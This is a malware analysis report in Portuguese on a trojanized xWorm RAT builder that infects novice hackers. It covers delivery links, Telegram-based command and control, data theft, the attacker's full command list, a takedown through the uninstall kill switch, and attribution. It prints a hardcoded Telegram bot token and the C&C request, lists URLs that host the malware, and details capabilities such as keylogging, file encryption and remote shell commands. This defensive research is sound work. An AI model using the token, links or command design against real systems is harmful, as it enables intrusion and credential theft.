Sumário executivo

Uma versão trojanizada do construtor xWorm RAT foi transformada em arma e propagada. É voltado especialmente para roteiristas iniciantes em segurança cibernética e baixe e use diretamente as ferramentas mencionadas em vários tutoriais, mostrando assim que não há honra entre ladrões. O malware se espalha principalmente por meio de um repositório Github, mas também usa outros serviços de compartilhamento de arquivos. Até agora, tem mais de 18.459 dispositivos comprometidos globalmente, é capaz de extrair dados confidenciais, como credenciais do navegador, tokens do Discord, dados do Telegram e informações do sistema. O malware também apresenta funcionalidades avançadas, incluindo verificações de virtualização, modificações no registro e uma ampla variedade de comandos que permitem o controle total dos sistemas infectados. Os principais países vítimas incluem Rússia, EUA, Índia, Ucrânia e Turquia.

O malware usa o Telegram como sua infraestrutura de comando e controle (C&C), usando tokens de bots e chamadas de API para emitir comandos para dispositivos infectados e exfiltrar dados roubados. A análise revelou que o malware até agora exfiltrou mais de 1 GB de credenciais do navegador de vários dispositivos. Os pesquisadores também identificaram o recurso “kill switch” do malware, que foi usado para interromper as operações em dispositivos ativos.

Os esforços de interrupção tiveram como alvo o botnet do malware, explorando seu comando de desinstalação. Embora eficazes para dispositivos ativos, limitações como máquinas off-line e limite de taxas do Telegram representam desafios. Os esforços de atribuição vincularam a operação a um agente de ameaças usando apelidos como”@shinyenigma“e”@milleniumrat“bem como contas do GitHub e um endereço ProtonMail..

Análises

O surgimento de sofisticados Trojans de acesso remoto (RATs) amplificou as ameaças cibernéticas, com o xWorm emergindo como um exemplo significativo. Recentemente, um construtor xWorm RAT trojanizado foi identificado, sendo propagado por agentes de ameaças por meio de vários canais, como repositórios do GitHub, serviços de compartilhamento de arquivos, canais do Telegram e fóruns. Isso foi direcionado especificamente para roteiristas que são novos em segurança cibernética e usam as ferramentas mencionadas em vários tutoriais.. Esse construtor fornece aos atacantes uma ferramenta simplificada para implantar e operar um RAT altamente capaz, que apresenta recursos avançados, como reconhecimento do sistema, exfiltração de dados e execução de comandos.

Esta análise visa fornecer informações detalhadas sobre a entrega, funcionalidade e impacto do construtor xWORM RAT trojanizado. Ao aproveitar os dados extraídos pelo Telegram, descobrimos as fontes de infecção, mapeamos seus mecanismos de comando e controle (C&C) e identificamos a amplitude de suas capacidades e dos dispositivos afetados. Além disso, conduzimos atividades de interrupção direcionadas à infraestrutura de botnet para mitigar suas operações.

Vetor de entrega

Usamos a API de telegrama para encaminhar mensagens extraídas usando o bot para uma conta sob nosso controle. Com base nas mensagens obtidas, fizemos um OCR nas imagens que eram basicamente capturas de tela dos dispositivos infectados pelo malware. A partir deles, filtramos os URLs e conseguimos obter as seguintes fontes de infecção:

Serviços de compartilhamento de arquivos

• https://mega.nz/file/wz1C3TYT
• https://www.upload.ee/files/16734195/AsyncClientexe.html 
• https://www.upload.ee/files/17050076/binded.exe.html 

Repositórios do GitHub

• https://github.com/LifelsHex/FastCryptor/blob/main/screen 
• https://github.com/Intestio/XWorm-RAT/releases/tag/xworm 
• https://github.com/FullPenetrationTesting/888-RAT 
• https://github.com/inheritedeu/888-RAT 
• https://github.com/guessthatname99/XWorm-RAT-V2.1 
• https://github.com/kavateforaro/PhantomCrypt 
• https://github.com/Cryakl/Ultimate-RAT-Collection/tree/main/ImminentMonitor 
• https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/ImminentMonitor 
• https://github.com/kiffGhost/Vedani-Crypter/releases/tag/Vedani-Crypter
• https://github.com/brainfucker854/XWorm-RAT-V5.6/pulls 

Canais de telegrama

• https://t.me/HAX_CRYPT  
• https://t.me/inheritedeu 

Youtube e outros sites

• https://www.youtube.com/watch?v=wYivVXDfx9w 
• https://sinister.ly/Thread-Free-cracked-RATs-and-Crypters

‍

‍

Características do malware

Verificações de virtualização

O malware verifica a virtualização no sistema lendo as chaves do registro. As chaves associadas com Barramento virtual NDIS e Renderização virtual têm maior probabilidade de existir em ambientes virtualizados porque lidam com interfaces de dispositivos virtuais para redes e gráficos. Assim, se o malware detectar que está sendo executado em um ambiente virtual, ele não espalhará ainda mais a infecção.

‍

‍

Modificação do registro

O xWorm também modifica várias entradas do registro. Quando o comando”/machine_id *startupadd” é chamado do servidor C&C, o malware adiciona entradas ao Registro do Windows para garantir que seja executado na inicialização do sistema. Ao modificar chaves de registro específicas, o malware pode executar automaticamente sua carga útil toda vez que o sistema for inicializado, mantendo assim o acesso contínuo.

‍

‍

Servidor C&C

O malware usa o telegrama como servidor de controle e comando. Os executáveis do malware são codificados com um ID de bot de telegrama e um token de bot, que são os seguintes:

• ID do bot do Telegram: bot8077286634
• Token de bot do Telegram: AAG1xhb6lejvqlqfjbmvojd2yshqxsZnNdQ

Exfiltração de dados

Na primeira execução, o malware envia uma solicitação para”http://ip-api.com/json/” para verificar o endereço IP e os detalhes de localização da máquina comprometida. Depois disso, ele reúne todas as senhas salvas dos navegadores e as envia por meio do Enviar documento ponto final da API do telegrama.

‍

‍

Em seguida, o malware também encaminha os tokens de discórdia que encontrou por meio do Enviar mensagem ponto final da API do telegram.

‍

‍

Depois disso, o malware extrai as informações do sistema da vítima e as encaminha para a API do telegrama via Enviar mensagem.

‍

‍

Em alguns casos, o malware também captura as capturas de tela do sistema depois de infectado e também rouba os dados do telegrama caso o telegrama seja instalado no dispositivo. Por fim, ele envia a mensagem conectada ao dispositivo para o bate-papo do telegrama junto com a localização (obtida em ip-api.com) e o ID da máquina do dispositivo que foi comprometido.

‍

‍

Agora que esses dados foram exfiltrados, o malware permanece inativo aguardando os comandos recebidos do servidor C&C. Ele usa o Receba atualizações método da API do telegrama para ouvir qualquer comando recebido pela máquina infectada. O comando geralmente se parece com /machine_id *command. Se um invasor enviar qualquer comando nesse formato para o bot do telegrama, a máquina infectada poderá selecioná-lo de lá e executar os comandos de acordo.

‍

Solicitação

GET /bot8077286634:aag1xhb6lejvqlqfjbmvojd2yshqxsznndq/Obter atualizações? deslocamento = -1 HTTP/1.1

Hospedeiro: api.telegram.org

‍

O malware à espera de comandos via getUpdates da API do telegram

‍

Características

A lista exaustiva de comandos que as máquinas infectadas obedecem é a seguinte:

• /online - Veja todos os seus bots
• /machine_id *help - ajuda
• /machine_id *desktop - faça uma captura de tela
• /machine_id *telegram - pega dados do telegrama
• /machine_id *discord - coleta dados do discord
• /machine_id *whois - obtém a localização do usuário
• /machine_id *history - registra o histórico do navegador
• /machine_id *HistoryForce - obtenha mais histórico do navegador removendo os processos do navegador, use com cuidado
• /machine_id *browsers - pega dados do navegador
• /machine_id *BrowsersForce - obtenha mais dados do navegador removendo os processos do navegador, use com cuidado
• /machine_id *getDesktop - cole arquivos de desktop úteis (.pdf, .txt etc)
• /machine_id *systeminfo - obtém informações do sistema
• /machine_id *activewindow - obtém o título da janela ativa
• /machine_id *batteryinfo - obtenha o status da bateria
• /machine_id *programlist - obtenha a lista de softwares instalados
• /machine_id *uninstall - desinstala o RAT do PC da vítima
• /machine_id *message* <message>*<error/warn/exclamination/question> - mostra a caixa de mensagem para o usuário, deixe o segundo argumento vazio para o tipo de caixa de mensagem padrão
• /machine_id *speak* <text>- pronuncia o texto para o usuário, funcionará somente se o texto estiver em inglês
• /machine_id *minimize - minimiza todas as janelas abertas
• /machine_id *maximize - maximize todas as janelas de volta
• /machine_id *openurl* <url>- abre o URL fornecido no navegador padrão do usuário
• /machine_id *shutdown - desliga o PC
• /machine_id *restart - reinicie no PC
• /machine_id *hibernate - entre no modo de hibernação
• /machine_id *logoff - desconexão do usuário
• /machine_id *bsod - invoca a tela azul da morte
• /machine_id *sendkeypress <keys>- a vítima “pressionará” determinadas teclas do teclado
• /machine_id *displayrotation<0/90/180/270> - Define o ângulo de rotação da tela, 0 - modo normal
• /machine_id *encrypt* <Password>- criptografa os arquivos do usuário com a senha fornecida, deve ser lembrado para descriptografia
• /machine_id *decrypt* <Password>- descriptografa os arquivos do usuário, todos os arquivos serão destruídos se a senha estiver errada
• /machine_id *copy**<src File/Dir full> -<dist File/Dir full path> copia um arquivo para um diretório, por exemplo, /3453 *copy* C:\Users\User\Downloads\1.txt * C:\Users\User\1.txt
• /machine_id *list* <Dir full path>- mostra arquivos e pastas em um diretório, por exemplo, /3453 *list* C:\Users
• <File/Dir full path>/machine_id *size* -obtém o tamanho do arquivo/diretório
• <File/Dir full path>/machine_id *delete* - exclui um arquivo ou pasta
• /machine_id *run* <File full path>- executa um arquivo (por exemplo, exe, png, txt etc)
• /machine_id *upload*<File/Dir full path> - Pega um arquivo do PC da vítima, não funcionará se o arquivo for muito grande
• /machine_id *download - o PC da vítima baixa um arquivo anexado a esta mensagem; se for uma imagem, também deve ser anexado como um arquivo
• /machine_id *processlist - mostra a lista dos processos atuais em execução
• /machine_id *processkill*<process name, e.g. discord, Telegram etc> - salva um processo pelo nome, não precisa adicionar.exe
• /machine_id *processpath*<process name, e.g. discord, Telegram etc> - Mostra o caminho para o processo, não precisa adicionar.exe
• /machine_id *desktopPath - mostra o caminho para a área de trabalho
• /machine_id *startuplist - veja a lista de programas de inicialização
• /machine_id *startupadd - adiciona o RAT à inicialização
• /machine_id *cmd* <command>- executa um comando cmd no PC da vítima
• /machine_id *destroy* <Dir full path>- destrói todos os arquivos/pastas possíveis em um diretório
• /machine_id *gift* * <NEW TOKEN><NEW CHAT ID>* <message>- apresente este bot para outro usuário, seu bot de telegrama precisa ser iniciado
• /machine_id *keylogger - obtém os registros de chaves do usuário
• /machine_id *KeyloggerClear - limpa os registros de chaves do usuário
• /machine_id *about - sobre

‍

Impacto

Usando uma determinada técnica, conseguimos apagar todos os dados que foram exfiltrados pelo Telegram pelo malware. Nossas descobertas mostram que, até agora, o malware foi comprometido mais de 18459 dispositivos. Os 5 principais países afetados pelo construtor RAT trojanizado são os seguintes:

1. Rússia
2. EUA
3. Índia
4. Ucrânia
5. Turquia

‍

‍

No entanto, dos mais de 18459 dispositivos infectados, as credenciais do navegador foram roubadas de apenas 2068 dispositivos até o momento. Os dados extraídos pelo malware são os seguintes:

• 4991 arquivos.jpg: Captura de tela de dispositivos comprometidos usando o comando /device_id *desktop.
• 2222 arquivos.zip: Os dados do navegador são despejados por padrão após a infecção.
• 20 .exe: Executáveis personalizados colocados em dispositivos infectados por agentes de ameaças em dispositivos infectados por meio do comando /device_id *download. Esses arquivos exe não estão presentes no virustotal no momento.
• 8. texto: Arquivos de keylogger obtidos após a execução do /device_id *keylogger

Em um caso, cada arquivo pdf e mp3 foi baixado da vítima apenas para testar se eles continham algo confidencial. A divisão por volume dos dados extraídos é a seguinte:

• 1112,21 MB (cerca de 1 GB) de credenciais do navegador foram extraídas.
• 425.784 MB de arquivos.jpg que são capturas de tela de dispositivos infectados.

Interrompendo um botnet

As máquinas infectadas estavam funcionando como uma botnet, recebendo comandos por meio da API do telegrama. Durante nossa observação, descobrimos que o malware tem um recurso que funciona como uma espécie de “interruptor de interrupção” que pode ser chamado a partir das mensagens de telegrama enviadas ao bot pelos agentes da ameaça.

Sobre Kill Switch

O malware inclui um comando /desinstalar que havia sido usado pelo agente da ameaça no passado para remover a infecção por malware de uma máquina usando seu ID de máquina.

‍

‍

Portanto, eram necessárias três coisas para remover a infecção de um dispositivo:

1. O ID da máquina atribuído pelo malware
2. Acesse o bot do telegrama para enviar a mensagem.
3. A máquina infectada deve estar online e ouvindo os comandos.

Os IDs de máquina que coletamos dos bate-papos e o nome de usuário do bot do telegrama foi obtido por meio do Me pegue ponto final da API do telegram. Combinando os dois, enviamos duas mensagens para o bot:

1. Todos os IDs de máquina presentes nas mensagens.
2. IDs de máquinas de forçamento bruto de 1 a 9999.

‍

‍

Durante esse período, qualquer máquina que estivesse ouvindo ativamente as mensagens e tivesse seu ID de máquina correspondente removeria automaticamente o malware. A captura de tela abaixo mostra o Receba atualizações mensagem que a máquina veria no momento em que nossa mensagem fosse interrompida.

‍

‍

As limitações da abordagem

• Nem todas as máquinas infectadas estarão on-line no momento da transmissão de nossas mensagens. Portanto, eles não teriam recebido o comando de desinstalação e permaneceriam infectados.
• A restrição de taxa está sendo feita por telegrama das mensagens enviadas ao bot. Portanto, algumas mensagens podem ter sido perdidas em trânsito ou até mesmo nossa conta de telegrama foi banida temporalmente por algum tempo.

Atribuição/Infraestrutura

Nas primeiras mensagens enviadas pelo bot do telegram, vimos que havia um arquivo.rdp enviado para uma máquina infectada pelos agentes da ameaça. Pode-se dizer com moderada confiança que estava sendo usado para fins de teste pelos atores da ameaça. O endereço da AWS no arquivo RDP era”ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.

‍

‍

A partir das mensagens de confirmação nos repositórios em que o agente da ameaça compartilhou o criador de RAT trojanizado, obtivemos o seguinte endereço de e-mail: [email protected]. No passado, o mesmo agente de ameaças usava várias contas do Github, como:

• https://github.com/ShinyEni/Millenium-RAT
• https://github.com/Shinyenigma/XWorm-RAT 

Nome de usuário do canal Telegram que oferece o RAT: @milleniumrat

Nome de usuário do ator da ameaça no Telegram: @shinyenigma

‍

‍

Mitigação

1. Detecção e resposta

• Detecção e resposta de terminais (EDR): Implante soluções avançadas de EDR para detectar e mitigar a atividade do RAT monitorando comportamentos incomuns do sistema, como modificações não autorizadas no registro, acesso a dados do navegador ou uso da API do Telegram.
• Monitoramento de rede: Utilize os Sistemas de Detecção e Prevenção de Intrusões (IDPS) para identificar e bloquear a comunicação com servidores C&C maliciosos, incluindo endpoints da API do Telegram.

2. Contenção

• Sistemas infectados em quarentena: Isole imediatamente as máquinas comprometidas da rede para evitar mais exfiltração de dados e movimentos laterais.
• Desative bots maliciosos do Telegram: Relate e solicite a suspensão dos bots do Telegram usados para operações de C&C.

3. Inteligência e conscientização sobre ameaças

• Atualize os feeds de inteligência de ameaças: Atualize continuamente os feeds de inteligência com IOCs (Indicadores de Compromisso) dos repositórios maliciosos identificados, canais do Telegram e serviços de compartilhamento de arquivos.
• Treinamento de funcionários: Instrua os funcionários a reconhecer links de phishing, downloads maliciosos e criadores de RAT falsos para minimizar os vetores iniciais de infecção.

4. Medidas proativas

• Bloquear IOCs conhecidos:algum texto
  • Bloqueie o acesso a repositórios maliciosos do GitHub, links de compartilhamento de arquivos e canais do Telegram no perímetro da rede.
• Sistemas de monitoramento e patch: Atualize regularmente o software, especialmente os aplicativos voltados para a Internet, para fechar as vulnerabilidades que os invasores exploram.
• Coloque a lista branca de aplicativos: Restrinja a execução de programas não autorizados, como o criador de RAT Trojanizado, em dispositivos endpoint.

5. Erradication

• Use comandos conhecidos do Kill Switch: Use comandos como /uninstall em dispositivos infectados acessíveis para remover malware com força, se possível.
• Remoção abrangente de ameaças: Depois de garantir que os sistemas estejam off-line, remova as chaves de registro maliciosas, limpe os scripts de inicialização e realize uma verificação profunda do sistema para garantir que o RAT seja erradicado.

6. Ações legais e colaborativas

• Interaja com as autoridades policiais: Colabore com as autoridades para rastrear e processar os atores envolvidos, aproveitando os detalhes de atribuição descobertos na investigação.
• Colaboração com fornecedores de plataformas: Faça parcerias com plataformas como GitHub, Telegram e serviços de compartilhamento de arquivos para remover conteúdo e contas maliciosas.

Indicadores de compromisso (IOCs)

‍

Referências

• ^#Protocolo de semáforo - Wikipedia
• https://tria.ge/
• https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm